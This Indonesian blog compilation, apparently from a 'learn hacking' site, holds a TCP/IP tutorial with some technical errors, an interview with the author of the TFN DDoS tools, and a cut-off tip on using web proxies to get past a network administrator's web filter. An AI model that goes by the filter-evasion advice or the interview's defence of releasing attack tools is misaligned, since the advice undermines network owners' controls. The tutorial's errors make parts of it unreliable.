Standard Distribution) UNIX. Versi ini digunakan secara luas pada
institusi penelitian dan pendidikan dan digunakan sebagai dasar dari
beberapa penerapan UNIX komersial, termasuk SunOS dari Sun dan Ultrix
dari Digital. Karena BSD UNIX mendirikan hubungan antara TCP/IP dan
sistem operasi UNIX, banyak implementasi UNIX sekarang menggabungkan
TCP/IP.

************************************************************************
unit informasi yg mana jaringan berkomunikasi. Tiap-tiap paket berisi
identitas (header) station pengirim dan penerima, informasi error-
control, permintaan suatu layanan dalam lapisan network, informasi
bagaimana menangani permintaan dan sembarang data penting yg harus
ditransfer.
************************************************************************

4. Layanan apa saja yg diberikan oleh TCP/IP ?
----------------------------------------------
Berikut ini adalah layanan "tradisional" yg dilakukan TCP/IP :

a. Pengiriman file (file transfer). File Transfer Protokol (FTP)
memungkinkan pengguna komputer yg satu untuk dapat mengirim ataupun
menerima file ke komputer jaringan. Karena masalah keamanan data,
maka FTP seringkali memerlukan nama pengguna (user name) dan
password, meskipun banyak juga FTP yg dapat diakses melalui
anonymous, alias tidak berpassword. (lihat RFC 959 untuk spesifikasi
FTP)
b. Remote login. Network terminal Protokol (telnet) memungkinkan
pengguna komputer dapat melakukan log in ke dalam suatu komputer
didalam suatu jaringan. Jadi hal ini berarti bahwa pengguna
menggunakan komputernya sebagai perpanjangan tangan dari komputer
jaringan tersebut.( lihat RFC 854 dan 855 untuk spesifikasi telnet
lebih lanjut)
c. Computer mail. Digunakan untuk menerapkan sistem elektronik mail.
(lihat RFC 821 dan 822)

d. Network File System (NFS). Pelayanan akses file-file jarak jauh yg
memungkinkan klien-klien untuk mengakses file-file pada komputer
jaringan jarak jauh walaupun file tersebut disimpan secara lokal.
(lihat RFC 1001 dan 1002 untuk keterangan lebih lanjut)
e. remote execution. Memungkinkan pengguna komputer untuk menjalankan
suatu program didalam komputer yg berbeda. Biasanya berguna jika
pengguna menggunakan komputer yg terbatas, sedangkan ia memerlukan
sumber yg banyak dalam suatu system komputer. Ada beberapa jenis
remote execution, ada yg berupa perintah-perintah dasar saja, yaitu
yg dapat dijalankan dalam system komputer yg sama dan ada pula yg
menggunakan "prosedure remote call system", yg memungkinkan program
untuk memanggil subroutine yg akan dijalankan di system komputer yg
berbeda. (sebagai contoh dalam Berkeley UNIX ada perintah "rsh" dan
"rexec")
f. name servers. Nama database alamat yg digunakan pada internet (lihat
RFC 822 dan 823 yg menjelaskan mengenai penggunaan protokol name
server yg bertujuan untuk menentukan nama host di internet.)

************************************************************************
RFC (Request For Comments) adalah merupakan standar yg digunakan dalam
internet, meskipun ada juga isinya yg merupakan bahan diskusi ataupun
omong kosong belaka. Diterbitkan oleh IAB (Internet Activities Board)
yg merupakan komite independen para peneliti dan profesional yg
mengerti teknis, kondisi dan evolusi sistem internet. Sebuah surat yg
mengikuti nomor RFC menunjukan status RFC :
S: standard, standar resmi bagi internet
DS: Draft standard, protokol tahap akhir sebelum disetujui sebagai
standar
PS: Proposed Standard, protokol pertimbangan untuk standar masa depan
I: Informational, berisikan bahan-bahan diskusi yg sifatnya informasi
E: Experimental, protokol dalam tahap percobaan tetapi bukan pada jalur
standar.
H: Historic, protokol-protokol yg telah digantikan atau tidak lagi
dipertimbankan utk standarisasi.
************************************************************************
5. Bagaimanakah bentuk arsitektur dari TCP/IP itu ?
---------------------------------------------------
Dikarenakan TCP/IP adalah serangkaian protokol di mana setiap protokol
melakukan sebagian dari keseluruhan tugas komunikasi jaringan, maka
tentulah implementasinya tak lepas dari arsitektur jaringan itu sendiri.
Arsitektur rangkaian protokol TCP/IP mendifinisikan berbagai cara agar
TCP/IP dapat saling menyesuaikan.

Karena TCP/IP merupakan salah satu lapisan protokol OSI * (Open System
Interconnections), berarti bahwa hierarki TCP/IP merujuk kepada 7
lapisan OSI tersebut. Berikut adalah model referensi OSI 7 lapisan, yg
mana setiap lapisan menyediakan tipe khusus pelayanan jaringan :

Peer process
|Application layer |<----------------->|Application layer |
|Presentation layer|<----------------->|Presentation layer|
|Session layer |<----------------->|Session layer |
|Transport layer |<----------------->|Transport layer |
|Network layer |<----------------->|Network layer |
|Data link layer |<----------------->|Data link layer |
|Physical layer |<----------------->|Physical layer |

Tiga lapisan teratas biasa dikenal sebagai "upper lever protocol"
sedangkan empat lapisan terbawah dikenal sebagai "lower level protocol".
Tiap lapisan berdiri sendiri tetapi fungsi dari masing-masing lapisan
bergantung dari keberhasilan operasi layer sebelumnya. Sebuah lapisan
pengirim hanya perlu berhubungan dengan lapisan yang sama di penerima
(jadi misalnya lapisan data link penerima hanya berhubungan dengan data
link pengirim) selain dengan satu layer di atas atau dibawahnya
(misalnya lapisan network berhubungan dengan lapisan transport
diatasnya atau dengan lapisan data link dibawahnya).

Model dengan menggunakan lapisan ini merupakan sebuah konsep yg penting
karena suatu fungsi yg rumit yg berkaitan dengan komunikasi dapat
dipecahkan menjadi sejumlah unit yg lebih kecil. Tiap lapisan bertugas
memberikan layanan tertentu pada lapisan diatasnya dan juga melindungi
lapisan diatasnya dari rincian cara pemberian layanan tersebut. Tiap
lapisan harus transparan sehingga modifikasi yg dilakukan atasnya tidak
akan menyebabkan perubahan pada lapisan yang lain. Lapisan menjalankan
perannya dalam pengalihan data dengan mengikuti peraturan yang berlaku
untuknya dan hanya berkomunikasi dengan lapisan yang setingkat.
Akibatnya sebuah layer pada satu sistem tertentu hanya akan berhubungan
dengan lapisan yang sama dari sistem yang lain. Proses ini dikenal
sebagai "Peer process". Dalam keadaan sebenarnya tidak ada data yang
langsung dialihkan antar lapisan yang sama dari dua sistem yang berbeda
ini. Lapisan atas akan memberikan data dan kendali ke lapisan dibawahnya
sampai lapisan yang terendah dicapai. Antara dua lapisan yang berdekatan
terdapat "interface" (antarmuka). Interface ini mendifinisikan operasi
dan layanan yang diberikan olehnya ke lapisan lebih atas. Tiap lapisan
harus melaksanakan sekumpulan fungsi khusus yang dipahami dengan
sempurna. Himpunan lapisan dan protokol dikenal sebagai "arsitektur
jaringan".

Pengendalian komunikasi dalam bentuk lapisan menambah overhead karena
tiap lapisan berkomunikasi dengan lawannya melalui "header". Walaupun
rumit tetapi fungsi tiap lapisan dapat dibuat dalam bentuk modul
sehingga kerumitan dapat ditanggulangi dengan mudah.
Disini kita tidak akan membahas model OSI secara mendalam secara
keseluruhannya, karena protokol TCP/IP tidak mengikuti benar model
referensi OSI tersebut. Walaupun demikian, TCP/IP model akan terlihat
seperti ini :

=========================================
|Application layer | |
|Presentation layer | Application layer |
|Session layer | |
|===================|===================|
|Transport layer | Transport layer/ |
| | Host to host |
|=======================================|
|Network layer | Network layer/ |
| | internet layer |
|===================|===================|
|Data Link layer | Network access |
|Physical layer | |
|===================|===================|
Model OSI model internet

Sekarang mari kita bahas keempat lapisan tersebut.

a. Network Access
Lapisan ini hanya menggambarkan bagaimana data dikodekan menjadi sinyal-
sinyal dan karakteristik antarmuka tambahan media.
b. Internet layer/ network layer
Untuk mengirimkan pesan pada suatu internetwork (suatu jaringan yang
mengandung beberapa segmen jaringan), tiap jaringan harus secara unik
diidentifikasi oleh alamat jaringan. Ketika jaringan menerima suatu
pesan dari lapisan yang lebih atas, lapisan network akan menambahkan
header pada pesan yang termasuk alamat asal dan tujuan jaringan.
Kombinasi dari data dan lapisan network disebut "paket". Informasi
alamat jaringan digunakan untuk mengirimkan pesan ke jaringan yang
benar, setelah pesan tersebut sampai pada jaringan yg benar, lapisan
data link dapat menggunakan alamat node untuk mengirimkan pesan ke node
tertentu.
_____ _____
|=====| |=====| ################### end nodes
\-----/ \-----/ # #
|===| |===| # #
| | # #
---|---------- |---- # routers # #
| # # # #
| # # # #
|=---=| # # # #
|=---=| # # #
| # _____ _____
komputer ******* # |=====| |=====|
Lainnya --- * token * -----|=---=| \-----/ \-----/
* ring * |=---=| |===| |===|
******* | | |
| -|-------- |---------|---------
-----
|
Komputer
Lainnya

meneruskan paket ke jaringan yang benar disebut "routing" dan peralatan
yang meneruskan paket adalah "routers". Suatu antar jaringan mempunyai
dua tipe node :

- "End nodes", menyediakan pelayanan kepada pemakai. End nodes
menggunakan lapisan network utk menambah informasi alamat jaringan
kepada paket, tetapi tidak melakukan routing. End nodes kadang-kadang
disebut "end system" (istilah OSI) atau "host" (istilah TCP/IP)
- Router memasukan mekanisme khusus untuk melakukan routing. Karena
routing merupakan tugas yg kompleks, router biasanya merupakan peralatan
tersendiri yg tidak menyediakan pelayanan kepada pengguna akhir. Router
kadang-kadang disebut "intermediate system" (istilah OSI) atau "gateway"
(istilah TCP/IP).

Selain itu juga lapisan ini bertanggung jawab untuk pengiriman data
melalui antar jaringan. Protokol lapisan intenet yang utama adalah
internet protokol, IP (RFC 791, lihat juga RFC 919, 922,950).
IP menggunakan protokol-protokol lain untuk tugas-tugas khusus internet.
ICMP(dibahas nanti) digunakan untuk mengirimkan pesan-pesan ke lapisan
host ke host. Adapun fungsi IP :

1. Pengalamatan
2. Fragmentasi datagram pada antar jaringan
3. Pengiriman datagram pada antar jaringan
c. Transport layer /host to host

Salah satu tanggung jawab lapisan transport adalah membagi pesan-pesan
menjadi fragment-fragment yang cocok dengan pembatasan ukuran yg
dibentuk oleh jaringan. Pada sisi penerima, lapisan transport
menggabungkan kembali fragment untuk mengembalikan pesan aslinya,
sehingga dapat diketahui bahwa lapisan transport memerlukan proses
khusus pada satu komputer ke proses yg bersesuaian pada komputer tujuan.
Hal ini dikenal sebagai Service Access Point (SAP) ID kepada setiap
paket (berlaku pada model OSI, istilah TCP/IP untuk SAP ini disebut port
*).

Mengenali pesan-pesan dari beberapa proses sedemikian rupa sehingga
pesan tersebut dikirimkan melalui media jaringan yg sama disebut
multiplexing. Prosedur mengembalikan pesan dan mengarahkannya pada
proses yg benar disebut demultiplexing.
Tanggung javab lapisan transport yg paling berat dalam hal pengiriman
pesan adalah mendeteksi kesalahan dalam pengiriman data tersebut. Ada
dua kategori umum deteksi kesalahan dapat dilakukan oleh lapisan
transport :

a. Reliable delivery, berarti kesalahan tidak dapat terjadi, tetapi
kesalahan akan dideteksi jika terjadi. Pemulihan kesalahan dilakukan
dengan jalan memberitahukan lapisan atas bahwa kesalahan telah
terjadi dan meminta pengirimna kembali paket yg kesalahannya
terdeteksi.
b. Unreliable delivery, bukan berarti kesalahan mungkin terjadi, tetapi
menunjukkan bahwa lapisan transport tidak memeriksa kesalahan
tersebut. Karena pemeriksaan kesalahan memerlukan waktu dan
mengurangi penampilan jaringan. Biasanya kategori ini digunakan jika
setiap paket mengandung pesan yg lengkap, sedangkan reliable
delivery, jika mengandung banyak paket. Unreliable delivery, sering
disebut datagram delivery dan paket-paket bebas yg dikerimkan
dengan cara ini sering disebut datagram.

Karena proses lapisan atas (application layer) memiliki kebutuhan yg
bervariasi, terdapat dua protokol lapisan transport /host to host, TCP
dan UDP. TCP adalah protokol yg handal. Protokol ini berusaha secara
seksama untuk mengirimkan data ke tujuan, memeriksa kesalahan,
mengirimkan data ulang bila diperlukan dan mengirimkan error ke lapisan
ats hanya bila TCP tidak berhasil mengadakan komunikasi (dibahas nanti).
Tetapi perlu dicatat bahwa kehandalan TCP tercapai dengan mengorbankan
bandwidth jaringan yg besar.

UDP (User Datagram Protocol) disisi lain adalah protokol yg tidak
handal. Protokol ini hanya semampunya saja mengirimkan data. UDP tidak
akan berusaha untuk mengembalikan datagram yg hilang dan proses pada
lapisan atas harus bertanggung jawab untuk mendeteksi data yg hilang
atau rusak dan mengirimkan ulang data tersebut bila dibutuhkan.
c. Application layer
Lapisan inilah biasa disebut lapisan akhir (front end) atau bisa disebut
user program. Lapisan inilah yg menjadi alasan keberadaan lapisan
sebelumnya. Lapisan sebelumnya hanya bertugas mengirimkan pesan yg
ditujukan utk lapisan ini. Di lapisan ini dapat ditemukan program yg
menyediakan pelayanan jaringan, seperti mail server (email program),
file transfer server (FTP program), remote terminal.

************************************************************************
Token Ring merupakan teknologi LAN data link yg didefinisikan oleh IEEE
802.4 dimana sistem dihubungkan satu sama lain dengan menggunakan
segmen kabel twisted-pair point-to-point untuk membentuk suatu struktur
ring. Sebuah sistem diijinkan untuk mengirim hanya bila sistem tersebut
memiliki token (data unit khsusus yg digunakan bersama-sama) yg akan
dilewarkan dari satu sistem ke sistem lain sekitar ring.
========================================================================
komputer port adalah tempat adalah tempat dimana informasi masuk dan
keluar. Di PC contohnya monitor sebagai keluaran informasi, keyboard dan
mouse sebagai masukan informasi. Tetapi dalam istilah internet, port
berbentuk virtual (software) bukan berbentuk fisik seperti RS232 serial
port (utk koneksi modem).
************************************************************************

6. Bagaimana TCP dan IP bekerja ?
---------------------------------
Seperti yg telah dikemukakan diatas TCP/IP hanyalah merupakan suatu
lapisan protokol(penghubung) antara satu komputer dg yg lainnya dalam
network, meskipun ke dua komputer tersebut memiliki OS yg berbeda. Untuk
mengerti lebih jauh marilah kita tinjau pengiriman sebuah email.
Dalam pengiriman email ada beberapa prinsip dasar yg harus dilakukan.
Pertama, mencakup hal-hal umum berupa siapa yg mengirim email, siapa yg
menerima email tersebut serta isi dari email tersebut. Kedua, bagaimana
cara agar email tersebut sampai pada tujuannya.Dari konsep ini kita
dapat mengetahui bahwa pengirim email memerlukan "perantara" yg
memungkinkan emailnya sampai ke tujuan (seperti layaknya pak pos). Dan
ini adalah tugas dari TCP/IP. Antara TCP dan IP ada pembagian tugas
masing-masing.

TCP merupakan connection-oriented, yg berarti bahwa kedua komputer yg
ikut serta dalam pertukaran data harus melakukan hubungan terlebih dulu
sebelum pertukaran data ( dalam hal ini email) berlangsung. Selain itu
TCP juga bertanggung jawab untuk menyakinkan bahwa email tersebut sampai
ke tujuan, memeriksa kesalahan dan mengirimkan error ke lapisan atas
hanya bila TCP tidak berhasil melakukan hubungan (hal inilah yg membuat
TCP sukar untuk dikelabuhi). Jika isi email tersebut terlalu besar
untuk satu datagram * , TCP akan membaginya kedalam beberapa datagram.
IP bertanggung jawab setelah hubungan berlangsung, tugasnya adalah untuk
meroute data packet . didalam network. IP hanya bertugas sebagai kurir
dari TCP dalam penyampaian datagram dan "tidak bertanggung jawab" jika
data tersebut tidak sampai dengan utuh (hal ini disebabkan IP tidak
memiliki informasi mengenai isi data yg dikirimkan) maka IP akan
mengirimkan pesan kesalahan ICMP*. Jika hal ini terjadi maka IP hanya
akan memberikan pesan kesalahan (error message) kembali ke sumber data.
Karena IP "hanya" mengirimkan data "tanpa" mengetahui mana data yg akan
disusun berikutnya menyebabkan IP mudah untuk dimodifikasi daerah
"sumber dan tujuan" datagram. Hal inilah penyebab banyak paket hilang
sebelum sampai kembali ke sumber awalnya. (jelas ! sumber dan tujuannya
sudah dimodifikasi)

Kalimat Datagram dan paket sering dipertukarkan penggunaanya. Secara
teknis, datagram adalah kalimat yg digunakan jika kita hendak
menggambarkan TCP/IP. Datagram adalah unit dari data, yg tercakup dalam
protokol.

************************************************************************
ICPM adalah kependekan dari Internet Control Message Protocol yg
bertugas memberikan pesan dalam IP. Berikut adalah beberapa pesan
potensial sering timbul (lengkapnya lihat RFC 792):

a. Destination unreachable, terjadi jika host,jaringan,port atau protokol
tertentu tidak dapat dijangkau.
b. Time exceded, dimana datagram tidak bisa dikirim karena time to live
habis.
c. Parameter problem, terjadi kesalahan parameter dan letak oktert dimana
kesalahan terdeteksi.
d. Source quench, terjadi karena router/host tujuan membuang datagram
karena batasan ruang buffer atau karena datagram tidak dapat diproses.
e. Redirect, pesan ini memberi saran kepada host asal datagram mengenai
router yang lebih tepat untuk menerima datagram tsb.
f. Echo request dan echo reply message, pesan ini saling mempertukarkan
data antara host.

Selain RFC 792 ada juga RFC 1256 yg isinya berupa ICMP router discovery
message dan merupakan perluasan dari ICMP, terutama membahas mengenai
kemampuan bagi host untuk menempatkan rute ke gateway.
************************************************************************

7. Bagaimanakah bentuk format header protokol UDP,TCP,IP ?
----------------------------------------------------------
1. UDP
------
UDP memberikan alternatif transport untuk proses yg tidak membutuhkan
pengiriman yg handal. Seperti yg telah dibahas sebelumnya, UDP merupakan
protokol yg tidak handal, karena tidak menjamin pengiriman data atau
perlindungan duplikasi. UDP tidak mengurus masalah penerimaan aliran
data dan pembuatan segmen yg sesuai untuk IP.Akibatnya, UDP adalah
protokol sederhana yg berjalan dengan kemampuan jauh dibawah TCP. Header
UDP tidak mengandung banyak informasi, berikut bentuk headernya :

++++++++++++++++++++++++++++++++++++++
+ Source Port + Destination Port +
++++++++++++++++++++++++++++++++++++++
+ Length + Checksum +
++++++++++++++++++++++++++++++++++++++

source port, adalah port asal dimana system mengirimkan datagram.
Destination port, adalah port tujuan pada host penerima.
Length, berisikan panjang datagram dan termasuk data.
Checksum, bersifat optional yg berfungsi utk meyakinkan bahwa data tidak
akan mengalami rusak (korup)

2. TCP
------
Seperti yg telah dibahas sebelumnya, TCP merupakan protokol yg handal
dan bertanggung jawab untuk mengirimkan aliran data ke tujuannya secara
handal dan berurutan. Untuk memastikan diterimanya data, TCP menggunakan
nomor urutan segmen dan acknowlegement (jawaban). Misalkan anda ingin
mengirim file berbentuk seperti berikut :
----------------------------------------------------------
TCP kemudian akan memecah pesan itu menjadi beberapa datagram (untuk
melakukan hal ini, TCP tidak mengetahui berapa besar datagram yg bisa
ditampung jaringan. Biasanya, TCP akan memberitahukan besarnya datagram
yg bisa dibuat, kemudian mengambil nilai yg terkecil darinya, untuk
memudahkan).
---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ----
TCP kemudian akan meletakan header di depan setiap datagram tersebut.
Header ini biasanya terdiri dari 20 oktet, tetapi yg terpenting adalah
oktet ini berisikan sumber dan tujuan nomor port (port number) dan
nomor urut (sequence number). Nomor port digunakan untuk menjaga data
dari banyaknya data yg lalu lalang. Misalkan ada 3 orang yg mengirim
file. TCP anda akan mengalokasikan nomor port 1000, 1001, dan 1002 untuk
transfer file. Ketika datagram dikirim, nomor port ini menjadi sumber
port (source port) number untuk masing-masing jenis transfer.
Yg perlu diperhatikan yaitu bahwa TCP perlu mengetahui juga port yg
dapat digunakan oleh tujuan (dilakukan diawal hubungan). Port ini
diletakan pada daerah tujuan port (destination port). Tentu saja jika
ada datagram yg kembali, maka source dan destination portnya akan
terbalik, dan sejak itu port anda menjadi destination port dan port
tujuan menjadi source port.

Setiap datagram mempunyai nomor urut (sequence number) masing-masing yg
berguna agar datagram tersebut dapat tersusun pada urutan yg benar dan
agar tidak ada datagram yg hilang. TCP tidak memberi nomor datagram,
tetapi pada oktetnya. Jadi jika ada 500 oktet data dalam setiap
datagram, datagram yg pertama mungkin akan bernomor urut 0, kedua 500,
ketiga 1000, selanjutnya 1500 dan eterusnya. Kemudian semua susunan
oktet didalam datagram akan diperiksa keadaannya benar atau salah, dan
biasa disebut dg checksum. Hasilnya kemudian diletakan ke header TCP.
Yg perlu diperhatikan ialah bahwa checksum ini dilakukan di kedua
komputer yg melakukan hubungan. Jika nilai keberadaan susunan oktet
antara satu checksum dg checksum yg lain tidak sama, maka sesuatu yg
tidak diinginkan akan terjadi pada datagram tersebut, yaitu gagalnya
koneksi (lihat bahasan sebelumnya). Jadi inilah bentuk datagram
tersebut:

++++++++++++++++++++++++++++++++++++++++++++++++
+ Source Port + Destination port +
++++++++++++++++++++++++++++++++++++++++++++++++
+ Sequence number +
++++++++++++++++++++++++++++++++++++++++++++++++
+ Acknowledgment number +
++++++++++++++++++++++++++++++++++++++++++++++++
+ Data + |U|A|P|R|S|F| +
+ offset+ Reserved|R|C|S|S|Y|I| Window +
+ + |G|K|H|T|N|N| +
++++++++++++++++++++++++++++++++++++++++++++++++
+ Checksum | Urgent pointer +
++++++++++++++++++++++++++++++++++++++++++++++++
+ data anda ------ sampai 500 oktet berikut +
+ ------------ +

Jika kita misalkan TCP header sebagai T, maka seluruh file akan
berbentuk sebagai berikut :
T---- T---- T---- T---- T---- T---- T---- T---- T---- T---- T----

Ada beberapa bagian dari header yg belum kita bahas. Biasanya bagian
header ini terlibat sewaktu hubungan berlangsung.

- Seperti 'acknowledgement number' misalnya, yg bertugas untuk menunggu
jawaban apakah datagram yg dikirim sudah sampai atau belum. Jika tidak
ada jawaban (acknowledgement) dalam batas waktu tertentu, maka data akan
dikirim lagi.
- Window berfungsi untuk mengontrol berapa banyak data yg bisa singgah
dalam satu waktu. Jika Window sudah terisi, ia akan segera langsung
mengirim data tersebut dan tidak akan menunggu data yg terlambat, karena
akan menyebabkan hubungan menjadi lambat.
- Urgent pointer menunjukan nomor urutan oktet menyusul data yg
mendesak. Urgent pointer adalah bilangan positif berisi posisi dari
nomor urutan pada segmen.
Reserved selalu berisi nol. Dicadangkan untuk penggunaan mendatang.
- Control bit (disamping kanan reserved, baca dari atas ke bawah). Ada
enam kontrol bit :
a. URG, Saat di set 1 ruang urgent pointer memiliki makna, set 0
diabaikan.
b. ACK saat di set ruang acknowledgement number memiliki arti.
c. PSH, memulai fungsi push.
d. RST, memaksa hubungan di reset.
e. SYN, melakukan sinkronisasi nomor urutan untuk hubungan. Bila diset maka
hubungan di buka.
f. FIN, hubungan tidak ada lagi.

3. IP
-----
TCP akan mengirim setiap datagram ke IP dan meminta IP untuk
mengirimkannya ke tujuan(tentu saja dg cara mengirimkan IP alamat
tujuan). Inilah tugas IP sebenarnya. IP tidak peduli apa isi dari
datagram, atau isi dari TCP header. Tugas IP sangat sederhana, yaitu
hanya mengantarkan datagram tersebut sampai tujuan (lihat bahasan
sebelumnya). Jika IP melewati suatu gateway, maka ia kemudian akan
menambahkan header miliknya. Hal yg penting dari header ini adalah
source address dan Destination address, protocol number dan
checksum. source address adalah alamat asal datagram. Destination
address adalah alamat tujuan datagram (ini penting agar gateway
mengetahui ke mana datagram akan pergi). Protocol number meminta IP
tujuan untuk mengirim datagram ke TCP. Karena meskipun jalannya IP
menggunakan TCP, tetapi ada juga protokol tertentu yg dapat menggunakan
IP, jadi kita harus memastikan IP menggunakan protokol apa untuk
mengirim datagram tersebut. Akhirnya, checksum akan meminta IP tujuan
untuk meyakinkan bahwa header tidak mengalami kerusakan. Yang perlu
dicatat yaitu bahwa TCP dan IP menggunakan checksum yang berbeda.
Berikut inilah tampilan header IP :

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ version + IHL + Type of Service + Total Length +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ identification + Flag + Fragment Offset +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Time to live + Protocol + Header Checksum +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Source Address +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Destination Address +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ TCP header, kemudian data ------- +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Jika kita misalkan IP header sebagai I, maka file sekarang akan
berbentuk :

IT---- IT---- IT---- IT----- IT----- IT----- IT----- IT----

Selanjutnya berikut ringkasan mengenai bagian header yg belum dibahas :
a. Total length, merupakan panjang keseluruhan datagram dalam oktet,
termasuk header dan data IP.
b. Identification, digunakan untuk membantu proses penggabungan kembali
pecahan-pecahan dari sebuah datagram.
c. Flag,berisi tiga kontrol flag.
- bit 0, dicadangkan, harus 0.
- Bit 1, tidak boleh pecah.
- Bit 2, masih ada fragment lagi.
d. Fragment offset, menunjukan posisi fragment di dalam datagram.
e. Time to live, menunjukan batas waktu maksimal bagi sebuah datagram
untuk berada pada jaringan.
f. Option, lihat RFC 791.

Phayzer

BELAJAR HACKING : Penjebol 8 Situs Kondang itu Buka Mulut

2009-04-26T22:07:00.001-07:00

Mixter. Begitu hacker yang ditengarai asal Jerman ini menyebut dirinya. Namanya sempat menjadi buah bibir lantara ia sukses menelanjangi (baca: membobol) 8 situs kondang sekaligus:Yahoo!, eBay, Buy.com, Amazon.com, CNN, E*Trade, MSN.com juga ZDNet.

"Terlalu gampang", ujar Mixter yang mengaku dirinya sebagai white-hat hacker alias hacker yang tahu tata krama perhacking-an. "Kelemahan Internet adalah madu pemikat orang untuk hacking", imbuh hacker 20 tahun yang notabene pembuat tool denial-of-service (DoS) bernama Tribal Flood Network dan versi terbaru, TFN2K. Kedua tool tersebut sanggup melakukan DoS dengan membanjiri (flooding) server maupun router dengan beragam tipe data.

Bukan Mixter kalo serangannya tidak membuat Bill Clinton meminta para jawara IT di negerinya menggelar pertemuan tingkat tinggi dalam rangka memerangi cyber criminals. Bahkan, untuk mengantisipasi kemungkinan serangan berikutnya, FBI merilis tool anti-TFN dan TFN 2000.

Tapi di balik musibah itu, ternyata ada hikmahnya. Kabarnya setelah serangan beruntun itu, bisnis asuransi sistem dari serangan hacker, meledak. Bagi Mixter sendiri Tribal Flood Network adalah tool pemandu (teaching tool) yang mampu memberita tahu hole - hole di sebuah Web. Berikut ringkasan obrolan ZDNet bareng Mixter.

ZDNet (T): Bagaimana anda belajar sekuriti ?

Mixter (J): Saya menggeluti komputer sejak berumur 6 tahun, dan tertarik teknis sistem operasi dan jaringan mulai umur 14 tahun, waktu komputer saya terkoneksi ke Internet.

T : Waktu itu pakai komputer apa ?

J : Commodore 64.

T : Anda mengganggap apa yang anda lakukan dikategorikan "hacking" ?

J : Saya pikir hacking saya kategori hacking 'tradisional', saya takut menggunakan istilah ini lantaran makna 'hacker' sangat negatif. Dulu saya sempat dijerat hukum. Tapi sekarang saya hacker yang menjunjung tinggi etika hacking (white-hat).

T : Memang anda berbuat apa ?

J : Seperti hacker kebanyakan, saya mulai mengambil alih dan mengamankan kanal chatting Efnet. Di samping membubulkan atas perbuatan saya itu enggak seberapa besar. Saya anggap ini kesalahan masa lalu untuk dipetik hikmahnya.

T : Mengapa anda membuat dan menyebarluaskan TFN padahal tool ini bisa disalahgunakan ?

J : Saya membuat TFN karena Trinoo (tool yang juga bisa melakukan DoS attack atau dikenal sebagai SMURF) tidak disebarluaskan. Mulanya, TFN saya namai 'teletubby flood network', tapi kok namanya jelek. Kendala terbesar infrastruktur jaringan saat ini adalah terlalu banyak kelemahan dan hole. Itulah mengapa kita bisa dengan mudah spoofing dan menyebarluaskan program. Saya putuskan membuat TFN dan mendistribusikan source code-nya untuk mengamankan situs sekalian supaya orang berkesempatan menguji dan membuat patch-nya dan mengantisipasi serangan serupa di masa mendatang. Sebut saja konsep sekuriti ini sebagai 'full disclosur". Tujuan utama sekuriti adalah agar orang menemukan dan memberi tahu titik kelemahan paling berbahaya sesegera mungkin. Dengan demikian saban orang berkesempatan menganalisa dan menciptakan penangkalnya.

T : Namun, tetap saja belum menyolusi. Soalnya, jika anda menginginkan agar orang lain mengakses situs anda, anda tentu mewaspadai DDoS (distribute denial-of-service) attack.

J : Tepat. Biang masalahnya adalah lemahnya autentikasi protocol sekarang. Ada banyak metode (untuk menangkis DoS attack yang lebih canggih), termasuk SYN interception dan proxying router. Sayang SYN interception sekedar meminimalisir dampak flood; tidak mampu menghentikan total.

T : Jadi, menurut anda, solusi paling jitu ?

J : Caranya segeralah hijrah ke IPv6 (Internet Protocol versi enam, IP Protocol yang dipakai sekarang adalah IP versi empat) yang menawarkan fasilitas autentikasi dan sekuriti lebih hebat.

T : Solusi jangka pendeknya ?

J : Untuk host - host yang dibobol, update selalu software dan konfigurasinya. Ingat, kelemahan Internet adalah madu pemikat orang untuk hacking. Kecuali itu, masalah bandwidth dan backbone pada provider.

T : Kapan sebaiknya IPv6 diimplementasikan ?

J : Sesegera mungkin. Bukan hanya faktor sekuriti tetapi juga tak terelakkannya pertumbuhan pesat Internet sampai tahun 2004. IPv4 itu basi dan dengan Y2K bug. Jika orang mengabaikan perkara ini, cepat atau lambat IPv4 akan mencuatkan masalah baru.

T : Menurut anda, apakah orang yang mendistribusikan tool - tool tadi (dan jatuh ke tangan orang yang tidak bertanggung jawab) juga ikut bertanggung jawab ? Contohnya anda sendiri ?

J : Itu tidak adil. Saya tahu kok pembuat Trinoo. Dia tidak ikut terlibat dalam penyerangan. Nampaknya dia ketakutan dan sengaja merahasiakan identitasnya.

T : Anda berniat membuat tool - tool serupa ?

J : Tidak. Saya rilis TFN2K atas saran CERT (Computer Emergency Response Team, sebuah organisasi keamanan data komputer dan internet berbasis di Pennsylvania). Tujuan rilis DDoS tool lainnya adalah untuk menyertakan feature attacking, stealthing dan sebagainya yang saya pikir, bisa dikembangkan di masa mendatang. Saya mengamati saat ini bermunculan tool derivat (turunan) dengan sejumlah variasi dan modifikasi, tapi tak satu pun yang tergolong handal apalagi memiliki daya dobrak hebat. Tujuan saya merilis TFN2K adalah saya ingin menunjukkan betapa banyaknya hole - hole yang ada di sekitar kita dan saya ingin agar segera diketahui.

T : Komentar anda soal serangan - serangan belakangan ini ?

Mixter : Ada rumor bahwa serangan akhir - akhir ini dikaitkan dengan protes terhadap e-commerce. Menurut saya, sebagian besar dimotivasi alasan sosial, dan saya tidak terlibat di dalamnya. Juga, lantaran penginstalan tool - tool yang ada tidak menuntut skill yang tinggi sekaligus penyerangan. Sekali lagi saya tandaskan bahwa mereka tidak punya tujuan merusak site orang lain.

BELAJAR HACKING : Penjebol 8 Situs Kondang itu Buka Mulut

2009-04-26T22:07:00.000-07:00

BELAJAR HACKING : Cara Mendapatkan WebFilter

2009-04-26T21:56:00.000-07:00

Gunakan sebuah Web Proxy. Hal ini akan bekerja sepanjang waktu. Tidak akan bekerja jika Administrator Jaringan mengetahui adanya web proxy ini dan akan memblokirnya.

-
-
-
-
-
-
-
- (proxy)
- (free proxy)
- (proxy)
- (proxy)
-
-
-
-
-
Pastikan bahwa saat berselancar di internet anda tidak akan 'anonymous' saat website yang coba anda kunjungi masih melintasi jaringan hingga ke browser anda; beberapa web filter berisi pencarian berbasis key word --- jika dalam kasus ini, bisa menyebabkan kelambatan atau bahkan diblock.
Anda juga dapat mecnoba hal ini dengan sedikit trik seperi yang pernah disarankan dalam suatu forum:

"Arahkan browser anda ke:
